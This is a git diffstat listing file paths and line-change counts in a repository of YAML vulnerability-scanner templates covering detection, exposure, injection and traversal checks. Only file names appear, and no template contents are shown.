poc/detect/pi-hole-detect-9581.yaml | 21 -
poc/detect/pi-hole-detect-9582.yaml | 22 +
poc/detect/pi-hole-detect-9583.yaml | 4 +
poc/detect/plone-cms-detect-9607.yaml | 23 -
...detect.yaml => plone-cms-detect-9608.yaml} | 0
poc/detect/prestashop-detect-9651.yaml | 28 +
poc/detect/prestashop-detect.yaml | 22 -
.../prometheus-exporter-detect-9674.yaml | 2 +
poc/detect/prtg-detect-9704.yaml | 18 +-
poc/detect/prtg-detect-9706.yaml | 32 -
.../puppet-node-manager-detect-9720.yaml | 27 -
poc/detect/puppet-node-manager-detect.yaml | 20 +
poc/detect/puppetdb-detect-9717.yaml | 15 +-
poc/detect/puppetdb-detect-9718.yaml | 11 +-
poc/detect/puppetserver-detect-9721.yaml | 12 +-
poc/detect/puppetserver-detect-9722.yaml | 40 -
poc/detect/redmine-cli-detect-9854.yaml | 23 +
poc/detect/remkon-manager-detect.yaml | 4 +
poc/detect/rhymix-cms-detect-9877.yaml | 13 +-
poc/detect/rhymix-cms-detect-9878.yaml | 22 +
poc/detect/rseenet-detect-9916.yaml | 31 -
poc/detect/rseenet-detect.yaml | 23 +
poc/detect/rstudio-detect-9917.yaml | 19 -
poc/detect/rstudio-detect-9919.yaml | 21 +
poc/detect/rstudio-detect.yaml | 2 -
poc/detect/s3-detect-9964.yaml | 19 +-
poc/detect/samba-detect-9988.yaml | 8 +-
poc/detect/samsung-printer-detect.yaml | 22 +-
poc/detect/sap-netweaver-detect-10042.yaml | 25 +-
poc/detect/sap-netweaver-detect-10047.yaml | 30 -
poc/detect/sap-recon-detect-10063.yaml | 30 -
poc/detect/sceditor-detect-10093.yaml | 20 +
poc/detect/sceditor-detect-10094.yaml | 7 +-
poc/detect/secmail-detect-10109.yaml | 20 +
poc/detect/secmail-detect-10112.yaml | 21 -
poc/detect/securityspy-detect.yaml | 16 +-
poc/detect/seeddms-detect-10129.yaml | 40 +-
poc/detect/seeddms-detect-10131.yaml | 21 +
...server-backup-manager-se-login-detect.yaml | 25 +-
poc/detect/shiro-detect-10195.yaml | 11 +-
poc/detect/shiro-detect-10196.yaml | 19 -
poc/detect/shopware-detect-10211.yaml | 24 -
poc/detect/shopware-detect-10212.yaml | 4 -
poc/detect/sitemap-detect.yaml | 21 +-
poc/detect/smartstore-detect-10332.yaml | 9 +-
poc/detect/smartstore-detect.yaml | 28 -
poc/detect/smb-v1-detection-10336.yaml | 3 +-
...sonicwall-email-security-detect-10384.yaml | 29 +
.../sonicwall-email-security-detect.yaml | 17 -
.../sophos-fw-version-detect-10397.yaml | 39 +-
poc/detect/tableau-server-detect-10643.yaml | 40 +
poc/detect/tableau-server-detect.yaml | 31 -
poc/detect/tech-detect-10672.yaml | 2730 +
poc/detect/tech-detect-10673.yaml | 2672 -
poc/detect/tech-detect-10676.yaml | 92 +-
.../telerik-dialoghandler-detect-10688.yaml | 3 -
.../telerik-dialoghandler-detect-10690.yaml | 38 -
.../telerik-dialoghandler-detect-10691.yaml | 37 +
.../telerik-fileupload-detect-10692.yaml | 13 +-
poc/detect/terraform-detect-10707.yaml | 10 +-
poc/detect/thinkcmf-detection-10719.yaml | 25 +
poc/detect/thinkcmf-detection.yaml | 23 +-
.../tibco-spotfire-services-detect.yaml | 39 +
poc/detect/tomcat-detect-10793.yaml | 4 +-
poc/detect/tomcat-detect.yaml | 21 +-
poc/detect/totemomail-detect.yaml | 4 +
poc/detect/trace-axd-detect.yaml | 13 +-
...ized-puppet-node-manager-detect-10958.yaml | 20 +
...ized-puppet-node-manager-detect-10959.yaml | 24 -
...authorized-puppet-node-manager-detect.yaml | 9 +-
poc/detect/virtual-ema-detect-11024.yaml | 18 -
poc/detect/virtual-ema-detect-11025.yaml | 18 +
poc/detect/vmware-vrealize-detect-11058.yaml | 8 +-
...11057.yaml => vmware-vrealize-detect.yaml} | 0
poc/detect/vnc-detect-11061.yaml | 6 +-
poc/detect/voipmonitor-detect.yaml | 6 +-
poc/detect/vsftpd-detection-11073.yaml | 17 -
poc/detect/vsftpd-detection-11075.yaml | 31 +
poc/detect/vsftpd-detection.yaml | 4 -
poc/detect/waf-detect-11086.yaml | 662 -
poc/detect/waf-detect-11087.yaml | 668 +
poc/detect/wamp-xdebug-detect-11103.yaml | 21 +-
poc/detect/wamp-xdebug-detect-11104.yaml | 16 +
.../weave-scope-dashboard-detect-11118.yaml | 1 -
poc/detect/web-ftp-detect-11136.yaml | 28 -
poc/detect/web-ftp-detect-11137.yaml | 43 +-
poc/detect/web-suite-detect-11168.yaml | 36 +
poc/detect/web-suite-detect.yaml | 31 -
poc/detect/weblogic-iiop-detect-11148.yaml | 4 -
poc/detect/weblogic-t3-detect-11151.yaml | 23 +-
...152.yaml => weblogic-t3-detect-11153.yaml} | 0
.../werkzeug-debugger-detect-11198.yaml | 5 +-
poc/detect/whm-login-detect.yaml | 22 +-
poc/detect/wondercms-detect-11222.yaml | 24 +
poc/detect/wondercms-detect.yaml | 21 -
...11261.yaml => wordpress-detect-11260.yaml} | 0
poc/detect/wordpress-detect.yaml | 57 +-
poc/detect/wordpress-gotmls-detect-11280.yaml | 30 -
poc/detect/wordpress-gotmls-detect.yaml | 20 +-
.../wordpress-plugins-detect-11298.yaml | 8 +-
poc/detect/wordpress-plugins-detect.yaml | 30 +-
poc/detect/wordpress-themes-detect.yaml | 22 +-
poc/detect/worksites-detection-11384.yaml | 14 -
poc/detect/worksites-detection-11385.yaml | 6 +-
poc/detect/wowza-streaming-detect.yaml | 20 -
poc/detect/wp-xmlrpc-pingback-detection.yaml | 11 +-
poc/detect/wso2-apimanager-detect-11638.yaml | 19 -
poc/detect/wuzhicms-detect-11653.yaml | 11 +-
poc/detect/wuzhicms-detect-11654.yaml | 30 +
poc/detect/wuzhicms-detect.yaml | 24 +
poc/detect/yourls-detect.yaml | 48 +
...ct-11787.yaml => zentao-detect-11785.yaml} | 0
poc/detect/zentao-detect.yaml | 17 +-
.../digitalrebar-traversal-6996.yaml | 16 +-
.../digitalrebar-traversal-6997.yaml | 16 +-
.../directory-traversal.yaml | 3 -
...ingframework-directory-traversal-7175.yaml | 32 -
...y-springframework-directory-traversal.yaml | 21 +
.../elfinder-path-traversal-7203.yaml | 37 -
...rsal.yaml => elfinder-path-traversal.yaml} | 0
.../erp-nc-directory-traversal-7245.yaml | 12 +-
.../erp-nc-directory-traversal-7248.yaml | 6 +-
.../finereport-path-traversal-7476.yaml | 22 +-
.../finereport-path-traversal-7478.yaml | 17 +-
.../kingdee-eas-directory-traversal-8489.yaml | 9 +-
.../kingdee-eas-directory-traversal.yaml | 36 -
...yaml => natshell-path-traversal-9006.yaml} | 0
.../natshell-path-traversal-9008.yaml | 13 +-
.../oa-tongda-path-traversal-9178.yaml | 33 -
.../oa-tongda-path-traversal-9179.yaml | 34 -
.../oa-tongda-path-traversal.yaml | 6 +-
.../pmb-directory-traversal-9614.yaml | 25 +-
.../pmb-directory-traversal.yaml | 22 +
... => tpshop-directory-traversal-10821.yaml} | 0
.../tpshop-directory-traversal.yaml | 27 +
....yaml => wooyun-path-traversal-11230.yaml} | 0
.../wooyun-path-traversal-11232.yaml | 27 -
poc/docker/amazon-docker-config-280.yaml | 28 -
.../amazon-docker-config-disclosure-278.yaml | 18 -
.../amazon-docker-config-disclosure.yaml | 12 +-
poc/docker/amazon-docker-config.yaml | 18 +
.../aws-ecs-container-agent-tasks-641.yaml | 25 -
poc/docker/docker-compose-config-7059.yaml | 27 -
poc/docker/docker-compose-config.yaml | 26 +
poc/docker/docker-registry-7064.yaml | 4 +-
poc/docker/docker-registry-7067.yaml | 20 +-
poc/docker/docker-registry-7068.yaml | 20 -
poc/docker/dockercfg-config-7056.yaml | 6 -
poc/docker/dockercfg-config.yaml | 26 -
.../dockerfile-hidden-disclosure-7061.yaml | 26 +
.../dockerfile-hidden-disclosure-7063.yaml | 31 -
poc/docker/dockerfile-hidden-disclosure.yaml | 7 +-
poc/docker/exposed-docker-api-7299.yaml | 12 +-
.../kubernetes-enterprise-manager-8528.yaml | 21 +
.../kubernetes-enterprise-manager-8529.yaml | 21 -
poc/docker/kubernetes-enterprise-manager.yaml | 18 +-
...ernetes-kustomization-disclosure-8532.yaml | 3 +-
.../kubernetes-kustomization-disclosure.yaml | 28 -
poc/docker/kubernetes-metrics-8536.yaml | 7 +-
poc/docker/kubernetes-metrics.yaml | 26 -
poc/docker/kubernetes-pods-8542.yaml | 26 +
poc/docker/kubernetes-pods-8543.yaml | 34 -
.../kubernetes-resource-report-8547.yaml | 4 -
...-unauth.yaml => kubernetes-unauth(1).yaml} | 0
poc/docker/kubernetes-version-8551.yaml | 13 +-
...sion.yaml => kubernetes-version-8552.yaml} | 0
...02.yaml => misconfigured-docker-8900.yaml} | 0
poc/docker/misconfigured-docker.yaml | 10 +-
poc/drupal/drupal-install-7105.yaml | 19 -
poc/drupal/drupal-install-7106.yaml | 11 +-
poc/drupal/drupal-user-enum-ajax-7111.yaml | 40 -
poc/drupal/drupal-user-enum-ajax.yaml | 13 +-
.../drupal-user-enum-redirect-7115.yaml | 21 +-
poc/elk/elasticsearch-7194.yaml | 20 +-
.../elasticsearch-sql-client-detect-7190.yaml | 21 +
.../elasticsearch-sql-client-detect-7192.yaml | 4 +-
poc/elk/exposed-kibana-7319.yaml | 17 +-
poc/elk/exposed-kibana-7320.yaml | 14 +-
...tect-8484.yaml => kibana-detect-8483.yaml} | 0
poc/elk/kibana-panel-8485.yaml | 22 +
poc/elk/kibana-panel-8486.yaml | 38 -
poc/elk/kibana-panel.yaml | 43 +-
poc/exposed/active-admin-exposure-41.yaml | 7 +
poc/exposed/active-admin-exposure-42.yaml | 18 -
poc/exposed/active-admin-exposure-43.yaml | 18 +
.../adobe-connect-username-exposure-100.yaml | 27 -
.../adobe-connect-username-exposure-101.yaml | 52 +-
.../adobe-connect-username-exposure-98.yaml | 3 +-
.../airflow-configuration-exposure-230.yaml | 28 +
.../airflow-configuration-exposure.yaml | 16 -
.../amazon-docker-config-disclosure-278.yaml | 18 -
.../amazon-docker-config-disclosure.yaml | 12 +-
...> android-debug-database-exposed-314.yaml} | 0
.../android-debug-database-exposed-315.yaml | 47 +-
.../ansible-config-disclosure-326.yaml | 28 +
poc/exposed/ansible-config-disclosure.yaml | 16 -
poc/exposed/ansible-tower-exposure.yaml | 13 +-
poc/exposed/appspec-yml-disclosure-527.yaml | 20 +-
poc/exposed/appspec-yml-disclosure-528.yaml | 3 +-
poc/exposed/appspec-yml-disclosure-529.yaml | 28 +
poc/exposed/avtech-dvr-exposure-614.yaml | 16 +-
poc/exposed/avtech-dvr-exposure-617.yaml | 16 +-
.../axiom-digitalocean-key-exposure-666.yaml | 8 +-
...l => axiom-digitalocean-key-exposure.yaml} | 0
.../beward-ipcamera-disclosure-715.yaml | 34 +
.../beward-ipcamera-disclosure-716.yaml | 26 +-
.../beward-ipcamera-disclosure-717.yaml | 8 +-
... => caucho-resin-info-disclosure-871.yaml} | 0
.../caucho-resin-info-disclosure-872.yaml | 15 +-
poc/exposed/cisco-meraki-exposure-944.yaml | 25 +
poc/exposed/cisco-meraki-exposure-946.yaml | 26 -
poc/exposed/cisco-smi-exposure-970.yaml | 14 +-
...e-972.yaml => cisco-smi-exposure-971.yaml} | 0
.../clockwork-dashboard-exposure-1015.yaml | 31 +
.../commax-credentials-disclosure-1158.yaml | 7 +-
.../commax-credentials-disclosure-1160.yaml | 36 +
poc/exposed/couchdb-exposure-1238.yaml | 25 -
poc/exposed/couchdb-exposure-1239.yaml | 24 +
poc/exposed/couchdb-exposure-1241.yaml | 6 +-
poc/exposed/credential-exposure-1249.yaml | 7 +-
poc/exposed/credentials-disclosure-1255.yaml | 4152 +-
poc/exposed/credentials-disclosure-1256.yaml | 708 +
poc/exposed/django-debug-exposed-404.yaml | 24 +
poc/exposed/django-debug-exposure.yaml | 23 +-
.../dockerfile-hidden-disclosure-7061.yaml | 26 +
.../dockerfile-hidden-disclosure-7063.yaml | 31 -
poc/exposed/dockerfile-hidden-disclosure.yaml | 7 +-
poc/exposed/druid-console-exposure-7092.yaml | 16 -
poc/exposed/druid-console-exposure.yaml | 2 +-
poc/exposed/exposed-adb-7280.yaml | 7 +-
poc/exposed/exposed-adb-7281.yaml | 15 +-
poc/exposed/exposed-adb-7282.yaml | 22 +
poc/exposed/exposed-alps-spring-7283.yaml | 30 +
poc/exposed/exposed-bitkeeper-7292.yaml | 28 +
...arcs-7298.yaml => exposed-darcs-7297.yaml} | 0
poc/exposed/exposed-docker-api-7299.yaml | 12 +-
poc/exposed/exposed-docker-api-7301.yaml | 29 +
poc/exposed/exposed-gitignore-7303.yaml | 40 -
poc/exposed/exposed-gitignore-7306.yaml | 19 +-
poc/exposed/exposed-glances-api-7308.yaml | 56 +-
poc/exposed/exposed-hg-7312.yaml | 33 +
.../exposed-jquery-file-upload-7313.yaml | 25 +-
poc/exposed/exposed-jquery-file-upload.yaml | 22 -
poc/exposed/exposed-kafdrop-7318.yaml | 19 +
poc/exposed/exposed-kafdrop.yaml | 9 +-
poc/exposed/exposed-kibana-7319.yaml | 17 +-
poc/exposed/exposed-kibana-7320.yaml | 14 +-
poc/exposed/exposed-mysql-initial-7323.yaml | 17 +-
poc/exposed/exposed-mysql-initial-7324.yaml | 9 +-
poc/exposed/exposed-nomad-7328.yaml | 31 -
poc/exposed/exposed-nomad-7330.yaml | 30 -
poc/exposed/exposed-nomad.yaml | 10 +-
poc/exposed/exposed-redis-7339.yaml | 27 +
poc/exposed/exposed-redis.yaml | 24 +-
poc/exposed/exposed-service-now.yaml | 16 +-
poc/exposed/exposed-sharepoint-list-7345.yaml | 28 -
poc/exposed/exposed-sharepoint-list-7347.yaml | 8 +-
poc/exposed/exposed-sqlite-manager-7349.yaml | 3 +-
poc/exposed/exposed-sqlite-manager.yaml | 18 +-
poc/exposed/exposed-svn-7351.yaml | 23 +
poc/exposed/exposed-svn-7354.yaml | 27 +-
poc/exposed/exposed-vscode-7357.yaml | 27 -
poc/exposed/exposed-vscode.yaml | 18 +
poc/exposed/exposed-webalizer-7358.yaml | 18 +
poc/exposed/exposed-webalizer-7360.yaml | 18 -
poc/exposed/exposed-zookeeper-7365.yaml | 18 -
poc/exposed/exposed-zookeeper.yaml | 19 +-
.../fanruanoa2012-disclosure-7389.yaml | 41 +
poc/exposed/fanruanoa2012-disclosure.yaml | 31 -
poc/exposed/firebase-config-exposure.yaml | 30 -
poc/exposed/flink-exposure-7509.yaml | 17 -
poc/exposed/flink-exposure-7511.yaml | 17 +
poc/exposed/flink-exposure.yaml | 19 +-
.../ftp-credentials-exposure-7568.yaml | 37 -
poc/exposed/ftp-credentials-exposure.yaml | 22 +
.../git-credentials-disclosure-7641.yaml | 32 +
...0.yaml => git-credentials-disclosure.yaml} | 0
.../github-workflows-disclosure-7664.yaml | 44 +
.../github-workflows-disclosure-7665.yaml | 8 +-
.../github-workflows-disclosure-7666.yaml | 51 -
poc/exposed/github-workflows-disclosure.yaml | 10 +-
.../glpi-telemetry-disclosure-7739.yaml | 25 -
poc/exposed/glpi-telemetry-disclosure.yaml | 50 +-
poc/exposed/gogs-install-exposure-7755.yaml | 21 +
poc/exposed/hadoop-exposure-7874.yaml | 4 +-
poc/exposed/hadoop-exposure.yaml | 20 +-
.../hp-ilo-serial-key-disclosure-8023.yaml | 24 -
.../hp-ilo-serial-key-disclosure-8025.yaml | 27 +
poc/exposed/hp-ilo-serial-key-disclosure.yaml | 7 +-
poc/exposed/ibm-friendly-path-exposure.yaml | 3 +-
poc/exposed/iotawatt-app-exposure-8187.yaml | 21 +-
poc/exposed/java-melody-exposed-8223.yaml | 6 +-
.../jfrog-unauth-build-exposed-8299.yaml | 30 +
.../jfrog-unauth-build-exposed-8302.yaml | 8 +-
poc/exposed/jolokia-info-disclosure-8358.yaml | 73 -
poc/exposed/jolokia-info-disclosure-8359.yaml | 71 +
poc/exposed/jolokia-info-disclosure.yaml | 9 +-
...ernetes-kustomization-disclosure-8532.yaml | 3 +-
.../kubernetes-kustomization-disclosure.yaml | 28 -
poc/exposed/lvmeng-uts-disclosure-8680.yaml | 29 -
poc/exposed/lvmeng-uts-disclosure.yaml | 8 +-
poc/exposed/magento-2-exposed-api-8687.yaml | 5 +-
poc/exposed/magento-2-exposed-api-8688.yaml | 45 +
poc/exposed/magento-config-disclosure.yaml | 50 -
poc/exposed/monitorix-exposure-8929.yaml | 23 +-
poc/exposed/netgear-router-exposure-9031.yaml | 20 +-
poc/exposed/netgear-router-exposure.yaml | 42 +
poc/exposed/opcache-status-exposure-9254.yaml | 21 +-
poc/exposed/opcache-status-exposure-9255.yaml | 19 +-
.../oracle-ebs-sqllog-disclosure-9369.yaml | 26 -
.../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +-
poc/exposed/pgadmin-exposure-9490.yaml | 27 -
poc/exposed/pgadmin-exposure-9491.yaml | 26 +
poc/exposed/pgadmin-exposure.yaml | 15 +-
poc/exposed/php-user-ini-disclosure-9561.yaml | 7 +-
...ml => pmb-local-file-disclosure-9619.yaml} | 0
poc/exposed/pmb-local-file-disclosure.yaml | 19 +
.../prometheus-exposed-panel-9681.yaml | 14 -
.../prometheus-exposed-panel-9683.yaml | 6 +-
...=> putty-private-key-disclosure-9730.yaml} | 0
poc/exposed/pyproject-disclosure-9736.yaml | 7 +-
poc/exposed/pyproject-disclosure-9737.yaml | 22 -
poc/exposed/pyproject-disclosure-9738.yaml | 26 +
poc/exposed/qihang-media-disclosure-9764.yaml | 25 +
poc/exposed/qihang-media-disclosure.yaml | 20 +
.../rails-secret-token-disclosure-9809.yaml | 22 -
.../rails-secret-token-disclosure-9810.yaml | 23 +
.../rails-secret-token-disclosure.yaml | 3 +-
...aml => roundcube-log-disclosure-9907.yaml} | 0
poc/exposed/roundcube-log-disclosure.yaml | 45 +-
.../ruijie-information-disclosure-9931.yaml | 21 +
.../ruijie-information-disclosure-9932.yaml | 21 +-
poc/exposed/selenium-exposure-10137.yaml | 32 +
poc/exposed/selenium-exposure-10138.yaml | 30 -
poc/exposed/selenium-exposure.yaml | 12 +-
.../sensitive-storage-exposure-10143.yaml | 3 +-
poc/exposed/sensitive-storage-exposure.yaml | 30 -
poc/exposed/setup-page-exposure-10181.yaml | 19 -
poc/exposed/setup-page-exposure.yaml | 3 -
.../snyk-ignore-file-disclosure-10347.yaml | 21 +
.../snyk-ignore-file-disclosure-10349.yaml | 24 -
poc/exposed/snyk-ignore-file-disclosure.yaml | 7 +-
poc/exposed/solr-exposure-10363.yaml | 12 +-
poc/exposed/solr-exposure-10364.yaml | 24 +
poc/exposed/solr-exposure-10366.yaml | 24 -
...kphp-509-information-disclosure-10755.yaml | 29 -
.../thinkphp-509-information-disclosure.yaml | 14 +-
poc/exposed/thumbs-db-disclosure-10761.yaml | 10 +-
...e.yaml => thumbs-db-disclosure-10763.yaml} | 0
.../tugboat-config-exposure-10842.yaml | 32 -
...aml => tugboat-config-exposure-10843.yaml} | 0
...tchguard-credentials-disclosure-11107.yaml | 16 +-
...=> watchguard-credentials-disclosure.yaml} | 0
...press-wpcourses-info-disclosure-11369.yaml | 34 +
...press-wpcourses-info-disclosure-11371.yaml | 36 -
.../wordpress-wpcourses-info-disclosure.yaml | 13 +-
.../wp-full-path-disclosure-11455.yaml | 16 +
.../wp-full-path-disclosure-11457.yaml | 18 -
poc/exposed/wp-full-path-disclosure.yaml | 9 +-
.../wp-mailchimp-log-exposure-11494.yaml | 2 +-
....yaml => yarn-manager-exposure-11731.yaml} | 0
poc/exposed/yarn-manager-exposure.yaml | 14 +-
.../zenphoto-installation-sensitive-info.yaml | 33 -
.../zenphoto-sensitive-info-11784.yaml | 28 +
poc/exposed/zenphoto-sensitive-info.yaml | 12 +-
poc/extract/extract-urls-7368.yaml | 6 +-
poc/extract/extract-urls-7370.yaml | 24 +
poc/favicon/favicon-detection-7441.yaml | 2026 -
poc/favicon/favicon-detection-7446.yaml | 97 +-
poc/ftp/crush-ftp-detect-1271.yaml | 40 +-
poc/ftp/crush-ftp-detect-1272.yaml | 21 +
poc/ftp/crush-ftp-detect.yaml | 40 +-
poc/ftp/crush-ftp-login-1273.yaml | 21 +-
poc/ftp/crush-ftp-login-1275.yaml | 23 +
poc/ftp/crush-ftp-login.yaml | 16 +-
poc/ftp/crushftp-default-login.yaml | 59 +
poc/ftp/ftp-credentials-exposure-7568.yaml | 37 -
poc/ftp/ftp-credentials-exposure.yaml | 22 +
poc/ftp/ftp-weak-credentials-7570.yaml | 43 -
poc/ftp/ftp-weak-credentials.yaml | 23 +-
.../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0
poc/ftp/ftpconfig-7566.yaml | 13 +-
poc/ftp/unauth-ftp-10939.yaml | 13 +-
poc/ftp/unauth-ftp-10942.yaml | 18 -
poc/ftp/vsftpd-detection-11073.yaml | 17 -
poc/ftp/vsftpd-detection-11075.yaml | 31 +
poc/ftp/vsftpd-detection.yaml | 4 -
poc/ftp/web-ftp-detect-11136.yaml | 28 -
poc/ftp/web-ftp-detect-11137.yaml | 43 +-
poc/ftp/wordpress-updraftplus-pem-key.yaml | 12 +-
poc/fuzz/adminer-panel-fuzz.yaml | 3 +-
...fuzzing-xss-get-params-html-injection.yaml | 8 +-
poc/fuzz/lfi-linux-fuzz.yaml | 78 +
poc/fuzz/linux-lfi-fuzz.yaml | 30 +-
...yaml => GCP-service-account (copy 1).yaml} | 0
poc/gcloud/gcp-service-account-11851.yaml | 16 +
.../axiom-digitalocean-key-exposure-666.yaml | 8 +-
...l => axiom-digitalocean-key-exposure.yaml} | 0
poc/git/digitalrebar-traversal-6996.yaml | 16 +-
poc/git/digitalrebar-traversal-6997.yaml | 16 +-
poc/git/exposed-gitignore-7303.yaml | 40 -
poc/git/exposed-gitignore-7306.yaml | 19 +-
poc/git/git-config-7635.yaml | 14 +
poc/git/git-config-7636.yaml | 19 +-
...l => git-config-nginxoffbyslash-7628.yaml} | 0
poc/git/git-config-nginxoffbyslash-7630.yaml | 35 +
poc/git/git-credentials-disclosure-7641.yaml | 32 +
...0.yaml => git-credentials-disclosure.yaml} | 0
poc/git/git-mailmap.yaml | 8 +-
poc/git/git-web-interface.yaml | 11 +-
poc/git/gitbook-detect-7623.yaml | 32 +-
poc/git/gitbook-detect-7624.yaml | 5 +-
poc/git/gitbook-takeover-7627.yaml | 22 +
poc/git/gitbook-takeover.yaml | 16 +-
poc/git/gitea-login.yaml | 13 +-
poc/git/github-enterprise-detect-7649.yaml | 19 +
poc/git/github-enterprise-detect-7650.yaml | 19 +-
poc/git/github-gemfile-files-7653.yaml | 36 +
poc/git/github-page-config-7654.yaml | 30 +
poc/git/github-workflows-disclosure-7664.yaml | 44 +
poc/git/github-workflows-disclosure-7665.yaml | 8 +-
poc/git/github-workflows-disclosure-7666.yaml | 51 -
poc/git/github-workflows-disclosure.yaml | 10 +-
poc/git/gitlab-api-user-enum-7668.yaml | 7 +-
poc/git/gitlab-api-user-enum.yaml | 16 +-
poc/git/gitlab-public-repos.yaml | 29 -
poc/git/gitlab-public-signup-7683.yaml | 26 -
poc/git/gitlab-public-snippets-7688.yaml | 9 +-
poc/git/gitlab-public-snippets-7690.yaml | 9 +-
poc/git/gitlab-rce-7692.yaml | 21 +-
poc/git/gitlab-rce-7693.yaml | 17 +-
.../gitlab-uninitialized-password-7694.yaml | 11 +-
.../gitlab-uninitialized-password-7695.yaml | 10 +-
poc/git/gitlab-user-enumeration-7698.yaml | 46 +-
poc/git/gitlab-weak-login-7707.yaml | 12 +-
poc/git/gitlab-weak-login.yaml | 56 -
poc/git/metadata-digitalocean.yaml | 12 +-
poc/git/wordpress-git-config-11278.yaml | 26 -
poc/git/wordpress-git-config-11279.yaml | 16 +-
poc/google/api-google-drive-432.yaml | 28 +
poc/google/api-google-drive.yaml | 23 -
poc/google/google-api-key-7768.yaml | 9 +-
poc/google/google-earth-dlogin-7781.yaml | 31 +
poc/google/google-earth-dlogin.yaml | 17 +-
poc/google/google-floc-disabled-7785.yaml | 6 +-
.../google-secrets.yaml} | 0
poc/google/google-storage-7788.yaml | 16 +
poc/google/google-storage-7789.yaml | 3 +-
poc/google/metadata-google-8820.yaml | 13 +-
poc/google/metadata-google-8821.yaml | 18 +-
poc/graphql/graphql-alias-batching-7826.yaml | 32 +-
poc/graphql/graphql-alias-batching.yaml | 37 -
poc/graphql/graphql-array-batching-7827.yaml | 14 +-
poc/graphql/graphql-array-batching.yaml | 43 +
poc/graphql/graphql-detect-7830.yaml | 158 +
poc/graphql/graphql-detect-7831.yaml | 158 -
.../graphql-field-suggestion-7834.yaml | 13 +-
poc/graphql/graphql-get-method-7835.yaml | 6 -
poc/graphql/graphql-get-method.yaml | 34 -
.../hasura-graphql-psql-exec-7899.yaml | 19 +-
poc/graphql/hasura-graphql-ssrf-7905.yaml | 47 +
poc/graphql/hasura-graphql-ssrf.yaml | 10 +-
poc/header/header-command-injection-7918.yaml | 17 +-
poc/header/header-command-injection-7919.yaml | 30 +
poc/header/header_blind_xss-7914.yaml | 14 +-
poc/header/host-header-injection-8000.yaml | 36 -
poc/header/host-header-poisoning.yaml | 89 -
poc/header/hostheaderpoisoning.yaml | 34 +-
.../http-missing-security-headers-8058.yaml | 170 +-
poc/header/http-missing-security-headers.yaml | 115 -
poc/header/log4j-header.yaml | 55 +
.../oob-header-based-interaction-9249.yaml | 7 +-
.../oob-header-based-interaction-9250.yaml | 43 +
poc/header/oob-header-based-interaction.yaml | 44 +
poc/header/sqli_header-10504.yaml | 23 -
poc/http/apache-httpd-rce-362.yaml | 41 -
poc/http/apache-httpd-rce.yaml | 13 +-
poc/http/cl-te-http-smuggling.yaml | 37 -
poc/http/default-lighttpd-page-6866.yaml | 22 -
poc/http/default-lighttpd-page-6867.yaml | 5 +-
...tp-etcd-unauthenticated-api-data-leak.yaml | 36 +-
.../http-missing-security-headers-8058.yaml | 170 +-
poc/http/http-missing-security-headers.yaml | 115 -
.../http-value-share-template-2.yaml} | 0
poc/http/httpbin-open-redirect-8049.yaml | 27 +-
poc/http/httpbin-open-redirect.yaml | 23 -
poc/http/httpbin-panel-8051.yaml | 26 -
poc/http/httpbin-panel.yaml | 19 +-
poc/http/httpbin-xss-8052.yaml | 22 +-
poc/http/httpd-config-8055.yaml | 34 +
poc/http/httpd-config.yaml | 24 -
poc/http/ibm-http-server-8095.yaml | 9 +-
poc/http/ibm-http-server.yaml | 25 -
poc/http/oracle-http-server-12c-9383.yaml | 4 +-
poc/http/oracle-http-server-12c-9384.yaml | 19 +
poc/http/oracle-httpserver12c.yaml | 9 +-
poc/http/springboot-httptrace-10469.yaml | 25 +-
.../ibm-advanced-system-management-8088.yaml | 23 +
.../ibm-advanced-system-management-8090.yaml | 24 -
poc/ibm/ibm-advanced-system-management.yaml | 12 +-
poc/ibm/ibm-friendly-path-exposure.yaml | 3 +-
poc/ibm/ibm-http-server-8095.yaml | 9 +-
poc/ibm/ibm-http-server.yaml | 25 -
...gin-8110.yaml => ibm-note-login-8112.yaml} | 0
poc/ibm/ibm-security-access-manager-8113.yaml | 3 +-
poc/ibm/ibm-service-assistant-8118.yaml | 24 -
poc/ibm/ibm-service-assistant.yaml | 20 +-
.../ibm-storage-default-credential-8124.yaml | 12 +-
.../ibm-storage-default-credential-8125.yaml | 21 +-
poc/injection/GLPI-9.3.3-SQL-Injection.yaml | 19 +-
.../buffalo-config-injection-798.yaml | 30 -
.../buffalo-config-injection-800.yaml | 34 +
.../buffalo-config-injection-801.yaml | 39 +
poc/injection/buffalo-config-injection.yaml | 6 +-
poc/injection/crlf-injection-1262.yaml | 29 +
poc/injection/crlf-injection-1263.yaml | 6 +-
poc/injection/crlf-injection-1264.yaml | 51 +-
.../duomicms-sql-injection-7124.yaml | 27 +
poc/injection/duomicms-sql-injection.yaml | 22 +
...fuzzing-xss-get-params-html-injection.yaml | 8 +-
poc/injection/glpi-9.3.3-sql-injection.yaml | 25 +
.../header-command-injection-7918.yaml | 17 +-
.../header-command-injection-7919.yaml | 30 +
poc/injection/host-header-injection-8000.yaml | 36 -
.../simple-crm-sql-injection-10275.yaml | 18 +-
.../simple-crm-sql-injection-10277.yaml | 12 +-
poc/injection/sql-injection.yaml | 94 +-
poc/injection/weiphp-sql-injection-11190.yaml | 11 +-
poc/java/default-jetty-page-6862.yaml | 17 +
poc/java/default-jetty-page-6863.yaml | 3 +-
...ingframework-directory-traversal-7175.yaml | 32 -
...y-springframework-directory-traversal.yaml | 21 +
poc/java/exposed-alps-spring-7283.yaml | 30 +
poc/java/java-melody-exposed-8223.yaml | 6 +-
poc/java/java-rmi-detect-8227.yaml | 17 +
poc/java/java-rmi-detect.yaml | 17 +-
poc/java/jboss-detect-8237.yaml | 34 +
poc/java/jboss-detect.yaml | 22 -
poc/java/jetty-showcontexts-enable-8297.yaml | 24 -
poc/java/jinfornet-jreport-lfi-8307.yaml | 19 +
poc/java/jinfornet-jreport-lfi-8308.yaml | 23 -
poc/java/jinfornet-jreport-lfi.yaml | 6 +-
poc/java/jsf-detection-8397.yaml | 19 -
poc/java/jsf-detection-8398.yaml | 31 +
poc/java/jsf-detection.yaml | 31 +-
poc/java/public-tomcat-manager-9708.yaml | 21 -
poc/java/public-tomcat-manager-9710.yaml | 11 +-
poc/java/shiro-detect-10195.yaml | 11 +-
poc/java/shiro-detect-10196.yaml | 19 -
.../spring-framework-exceptions-10493.yaml | 28 -
poc/java/spring-framework-exceptions.yaml | 24 +
poc/java/springForShell-CVE-2022-22963.yaml | 36 +
poc/java/springboot-actuator-10433.yaml | 24 +-
poc/java/springboot-actuator-10435.yaml | 34 -
...pringboot-actuators-jolokia-xxe-10430.yaml | 28 +
...pringboot-actuators-jolokia-xxe-10431.yaml | 31 -
